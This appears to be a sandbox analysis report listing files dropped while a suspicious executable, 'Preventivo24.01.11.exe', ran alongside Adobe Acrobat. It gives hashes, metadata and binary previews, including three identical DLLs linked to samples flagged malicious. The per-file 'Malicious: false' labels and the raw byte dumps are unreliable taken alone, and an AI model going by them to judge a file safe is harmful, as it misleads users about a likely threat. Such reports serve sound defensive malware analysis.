C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.270527474388663
Encrypted:	false
SSDEEP:	6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfbPtdPeUkwRe9:YvXKX9drEZc0v2GDV8Ukee9
MD5:	66618CF190C3033ABAB2383F1A037CDD
SHA1:	05D1FD8D42423EB2A056438759A23ABA72265AD1
SHA-256:	6907ACC3F8C0C04EA5C9DEFFC4224E24B76A7C0E7CA946311FD7D9D8116AA215
SHA-512:	335DA67EDAF34B6481197344CE9F06D50EB12601B2AD1D209A38FFFBB5C12CFB7AA89CAB9940D064A8FED508F5FDC8BBA54B075F0FF9BEB6E714911A0BAF69D2
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.275572745613981
Encrypted:	false
SSDEEP:	6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJf21rPeUkwRe9:YvXKX9drEZc0v2G+16Ukee9
MD5:	2C24C28097FC38C7B6C6654E14D1A6BE
SHA1:	D4609348FCEBC09FA8C0C11D60BF8142E15FF649
SHA-256:	CAD51D6348EAAA148A54A6C1926F106038540B9927DDCDCD4FC6E2836EA4067C
SHA-512:	CCF3F72EB84D6556CE31510ED82B6DDFE0B5028B065372F9E19B4BF5FFE67BDA0868A81A055C356028E0919DA9E59049064FEA5E54FD58CA8D1C9008DAF7DF7E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1250
Entropy (8bit):	5.715849560792744
Encrypted:	false
SSDEEP:	24:Yv6XjrEzvTamXayLgEs54c3drNaHmTBcu14wChqx+plVCV9FJN3H6w:YvjrBgn5drpTB5OJhr9Q9FJ9H3
MD5:	A720BB898C0D59DA44E99A28B80ABB57
SHA1:	21228D703535273259D71D6B8A5C3ACCAC2360FF
SHA-256:	9261494E0295FEFB48025FD89D1BEC6143EF4CCAD9EB9F2CB861F52378D9E6C0
SHA-512:	3D8D9D632FBD88F9667CA2724EFD981B199D3D15F1D2D73AAA7F9471680EA3AE2CE848F687EDB1F7D13584207BBF659298222C2AEE722564FE365BA5B2744A6D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_2","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"8deb148d-1a64-4e57-9648-e8bf939c598e","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJTZW5kIGRvY3VtZW50cyAmIGZvcm1zIFxuZm9yIGZhc3QgZS1zaWduaW5nIG9ubGluZS4iLCJiYWNrZ3JvdW5kX3N0eWxpbmciOnsiYmFja2dyb3VuZF9jb

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.250873045342247
Encrypted:	false
SSDEEP:	6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfshHHrPeUkwRe9:YvXKX9drEZc0v2GUUUkee9
MD5:	A79981F201FD27A47C7D0A830078BCDC
SHA1:	25C59BBEA21E9242CF78F8C2E08218371F921DBC
SHA-256:	C64D76CBFEF23BB04B617F47D809A5079C31A95E46287C78ED4EE5EFD52FC1E9
SHA-512:	A125FD5FC6FB2D71C0CF576EA580E29FEA9006F2628DBE373C51FDC2406954FD0FFD5F659F2D100BA9B026BDE1668776B72C33FDE73537A3D49325FE67972323
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	782
Entropy (8bit):	5.357579607989155
Encrypted:	false
SSDEEP:	12:YvXKX9drEZc0v2GTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWRW1:Yv6XjrEzvQ168CgEXX5kcIfANh6w
MD5:	AE7067E0369DA0FC7AEB1257B7016A22
SHA1:	C2F0EDDF4FE4E05FA37B0291210A4EB15CC23C66
SHA-256:	6A332DCDD7F498618B14E99C03B0E5CB2DAFC40C1EF4063E85E525DBB5656D1E
SHA-512:	0A90828468A08132379E5312F16F6163A282DA08C6A018A772AA587313068E737AC2B2659A0DADFFD6320489FBBC23A2F766E26E637D08DCE5BB8711335563A3
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1706008698598}}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2818
Entropy (8bit):	5.127436694158643
Encrypted:	false
SSDEEP:	24:YsqBwq0uxaDayBYRvMgmxFaCFMIlKd0mA4zVB4Yd4QW7CjMSj0SFQ9y0F2IAv2Lm:YCY1mQ4R145uYXMk09dAviU9Nkx98
MD5:	DDC5FAD41CF2DA20F2CD11395D0548E8
SHA1:	7356665EBB098262FAF8DD68B1DF06DDD36CF335
SHA-256:	6097BA5716B3ABD570DA3C15D8AB6BA86747B3E0EA7FD68642562EF794163527
SHA-512:	5A079BF24B9F19B6FDFE09E150A7FE07A3CB09C5CF992AB9E575994D5BD1CD732C7BF9ED8016ACEC2456FC75F25FE14149B6B55EA8C12E491850991CEC30FF35
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"2766787c734b0355c5c3dd7dd276438a","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1706008698000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"148a230e3dff4ce102810dc14152ce3e","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1368,"ts":1706008698000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f6404e55972a67397fc4cdfd3c68e41d","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1706008698000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"5084a35e095cd4116d7c5d11ef7b28e8","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1706008698000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"bc498d852bfb7e7b970a86b49a8cd656","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1230,"ts":1706008698000},{"id":"Edit_InApp_Aug2020","info":{"dg":"b2597987459352b5acbee1fad0fa2cff","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.187069151370841
Encrypted:	false
SSDEEP:	48:TGufl2GL7msEHUUUUUUUUmSvR9H9vxFGiDIAEkGVvpc:lNVmswUUUUUUUUm+FGSItA
MD5:	948E40B8FF3C0C6CD247274DEAE70C59
SHA1:	B05A699952645335FA3C4A8CCFB80007C2F0EE16
SHA-256:	BE186B503810B03A14942AB5C0F56F0938592A4E56FCD1A7ED8F7B9F11B91866
SHA-512:	2A49D2187DCB9AE2154B629062FFAFCAC66EE2C8B71B903DD62A8AED6BFB2AB96100662152B83BBF6F1FEE0F17678948EC7FED26F37388ECC2E4A1A74F6D9C61
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.6041849445913965
Encrypted:	false
SSDEEP:	48:7MwbKUUUUUUUUUUkvR9H9vxFGiDIAEkGVvcqFl2GL7msz:7gUUUUUUUUUU0FGSIteKVmsz
MD5:	457D6C179B1F46D95BF0F49AA3BA545C
SHA1:	EA61239924BDB8B1BF215E44A5A40E6A675EF193
SHA-256:	B7D7BCF014D34E0E25ADEE0DBCA3950B974B706C22F89E6C70F58BE1AE14F959
SHA-512:	2FC0407B162A2B87F8B088EAB01221ABCAE4EB452967DC50CF6285CF5A5BAB7B918D6508E3DE648DD91F4035B08737F5D1E334AC08D3EB8E6F3A85D32FB84FE3
Malicious:	false
Preview:	.... .c.....87........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgOhP2YblS81v17heApUsOXEPeYyu:6a6TZ44ADEOhPhblS81vahBK
MD5:	3E57A19237714CD662B6E6E5EF9EF5F5
SHA1:	7586ADBBA2695B96E5E5C7A9BC5A16BC519755CF
SHA-256:	7D1A7602AE02EC09DF354F701089E1C213D1F7A663F16AB51F599DA6937CEDB6
SHA-512:	C3089367989CB30159D9DEE4D172287379B4767E184D8CEDFFEBB7FD825916E5DCDC7B90E612EC6F3B367CA7A94E9EF7AF266F64D01B6F24FDE8661E7692DC0B
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Temp\MSI1b425.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.505069684106714
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rpa3GlGll:Qw946cPbiOxDlbYnuRK0IGlGn
MD5:	0A5ED263E52032380525899C0D784885
SHA1:	387775C19E1524FACC0881E54141FA206671C716
SHA-256:	61BB219BC3E9426DE667600AADF1EF4322561CC65F0DA5B718B4D3CA61652C2B
SHA-512:	F3DCDC6F5C7E5CDF47F454EFA40EDF7CFBBDAF83723E46D58B2CA5CF160D44856091017173CC67A47C9C16564656C4D2A49D57868423DF9323603E345549EE9F
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.0.1./.2.0.2.4. . .1.2.:.1.8.:.1.8. .=.=.=.....

C:\Users\user\AppData\Local\Temp\MSI6F00.tmp

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	756576
Entropy (8bit):	6.616629532136608
Encrypted:	false
SSDEEP:	12288:+0WEHqIw3Gy6hFWBZGNTph0lhSMXle1Gf5PsTcuvX:+xDf3z6hFWHah0lhSMXlKW547vX
MD5:	B158D8D605571EA47A238DF5AB43DFAA
SHA1:	BB91AE1F2F7142B9099E3CC285F4F5B84DE568E4
SHA-256:	CA763693CC25D316F14A9EBAD80EBF00590329550C45ADB7E5205486533C2504
SHA-512:	56AEF59C198ACF2FCD0D95EA6E32CE1C706E5098A0800FEFF13DDB427BFB4D538DE1C415A5CB5496B09A5825155E3ABB1C13C8C37DC31549604BD4D63CB70591
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Fatturation110124.exe, Detection: malicious, Browse Filename: Fatturation110124.exe, Detection: malicious, Browse Filename: Fatturation110124.exe, Detection: malicious, Browse Filename: 1tuL3R5svT.exe, Detection: malicious, Browse Filename: 1tuL3R5svT.exe, Detection: malicious, Browse Filename: Setup.msi, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......+.ZRo.4.o.4.o.4...7.d.4...1...4.iV0.}.4.iV7.x.4.iV1.!.4...0.v.4...2.n.4...5.F.4.o.5...4..V=...4..V4.n.4..V..n.4.o..n.4..V6.n.4.Richo.4.........................PE..L.....e.........."!...&............................................................bL....@A........................ ..........,....................N..`=.......x..p...p...............................@...............x............................text...j........................... ..`.rdata..H...........................@..@.data....%..........................@....rsrc...............................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI6FDC.tmp

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	756576
Entropy (8bit):	6.616629532136608
Encrypted:	false
SSDEEP:	12288:+0WEHqIw3Gy6hFWBZGNTph0lhSMXle1Gf5PsTcuvX:+xDf3z6hFWHah0lhSMXlKW547vX
MD5:	B158D8D605571EA47A238DF5AB43DFAA
SHA1:	BB91AE1F2F7142B9099E3CC285F4F5B84DE568E4
SHA-256:	CA763693CC25D316F14A9EBAD80EBF00590329550C45ADB7E5205486533C2504
SHA-512:	56AEF59C198ACF2FCD0D95EA6E32CE1C706E5098A0800FEFF13DDB427BFB4D538DE1C415A5CB5496B09A5825155E3ABB1C13C8C37DC31549604BD4D63CB70591
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Fatturation110124.exe, Detection: malicious, Browse Filename: Fatturation110124.exe, Detection: malicious, Browse Filename: Fatturation110124.exe, Detection: malicious, Browse Filename: 1tuL3R5svT.exe, Detection: malicious, Browse Filename: 1tuL3R5svT.exe, Detection: malicious, Browse Filename: Setup.msi, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......+.ZRo.4.o.4.o.4...7.d.4...1...4.iV0.}.4.iV7.x.4.iV1.!.4...0.v.4...2.n.4...5.F.4.o.5...4..V=...4..V4.n.4..V..n.4.o..n.4..V6.n.4.Richo.4.........................PE..L.....e.........."!...&............................................................bL....@A........................ ..........,....................N..`=.......x..p...p...............................@...............x............................text...j........................... ..`.rdata..H...........................@..@.data....%..........................@....rsrc...............................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	756576
Entropy (8bit):	6.616629532136608
Encrypted:	false
SSDEEP:	12288:+0WEHqIw3Gy6hFWBZGNTph0lhSMXle1Gf5PsTcuvX:+xDf3z6hFWHah0lhSMXlKW547vX
MD5:	B158D8D605571EA47A238DF5AB43DFAA
SHA1:	BB91AE1F2F7142B9099E3CC285F4F5B84DE568E4
SHA-256:	CA763693CC25D316F14A9EBAD80EBF00590329550C45ADB7E5205486533C2504
SHA-512:	56AEF59C198ACF2FCD0D95EA6E32CE1C706E5098A0800FEFF13DDB427BFB4D538DE1C415A5CB5496B09A5825155E3ABB1C13C8C37DC31549604BD4D63CB70591
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......+.ZRo.4.o.4.o.4...7.d.4...1...4.iV0.}.4.iV7.x.4.iV1.!.4...0.v.4...2.n.4...5.F.4.o.5...4..V=...4..V4.n.4..V..n.4.o..n.4..V6.n.4.Richo.4.........................PE..L.....e.........."!...&............................................................bL....@A........................ ..........,....................N..`=.......x..p...p...............................@...............x............................text...j........................... ..`.rdata..H...........................@..@.data....%..........................@....rsrc...............................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-01-23 12-18-12-549.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.345946398610936
Encrypted:	false
SSDEEP:	384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
MD5:	8947C10F5AB6CFFFAE64BCA79B5A0BE3
SHA1:	70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
SHA-256:	4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
SHA-512:	B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
Malicious:	false
Preview:	SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.349964663512601
Encrypted:	false
SSDEEP:	384:UizhlhQhNhnhehvh2hdh7hGhEsfs5OsEsvXwXM626yYVYJtctftX1/iU+UApKGTE:U+nO/VMdkf98CQEO5cgcPBkcq9fadTEH
MD5:	A7551F2B29E55D63E5FAEC1206F8E4FF
SHA1:	AE380EE3FA3F901C467A87628710FCCC284D4872
SHA-256:	67CCE11B371C99F701BB1CF0FE2943679654E5E31D3DED06ED434D035942A7C9
SHA-512:	D030EA6C081B444077179227D99A1B542709C76F6349F963DD07295D35149DE6F6F6EDB4B5540ED6B8D1A79158CF2DF7216A856840F0E43E525C13C6F2F290AD
Malicious:	false
Preview:	SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:588+0100 ThreadID=8040 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:590+0100 ThreadID=8040 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:590+0100 ThreadID=8040 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:590+0100 ThreadID=8040 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:590+0100 ThreadID=8040 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.386753438347909
Encrypted:	false
SSDEEP:	768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rE:A
MD5:	9C08E7565A5DBDC7E30CD9D99CE3E4CD
SHA1:	6C3121CACB696B01F3DC5E092D5DDD6E6E6E836E
SHA-256:	60587FB87F40B87E05784314CB938CB1D9543C4F2C6C603AEA23290279FCA4DA
SHA-512:	0A7728328DC8E4CFF1C73E0878585364D4258F0B5A5D250C07FB4B524F95A475D6932A4D0699E64FD5108EAE7D304105AD936374C3E340167F3C0F021E39731A
Malicious:	false
Preview:	03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : *************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***********************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\06c15fdc-39b6-4101-8f8f-d99a71462b93.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
MD5:	A0CFC77914D9BFBDD8BC1B1154A7B364
SHA1:	54962BFDF3797C95DC2A4C8B29E873743811AD30
SHA-256:	81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
SHA-512:	74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA 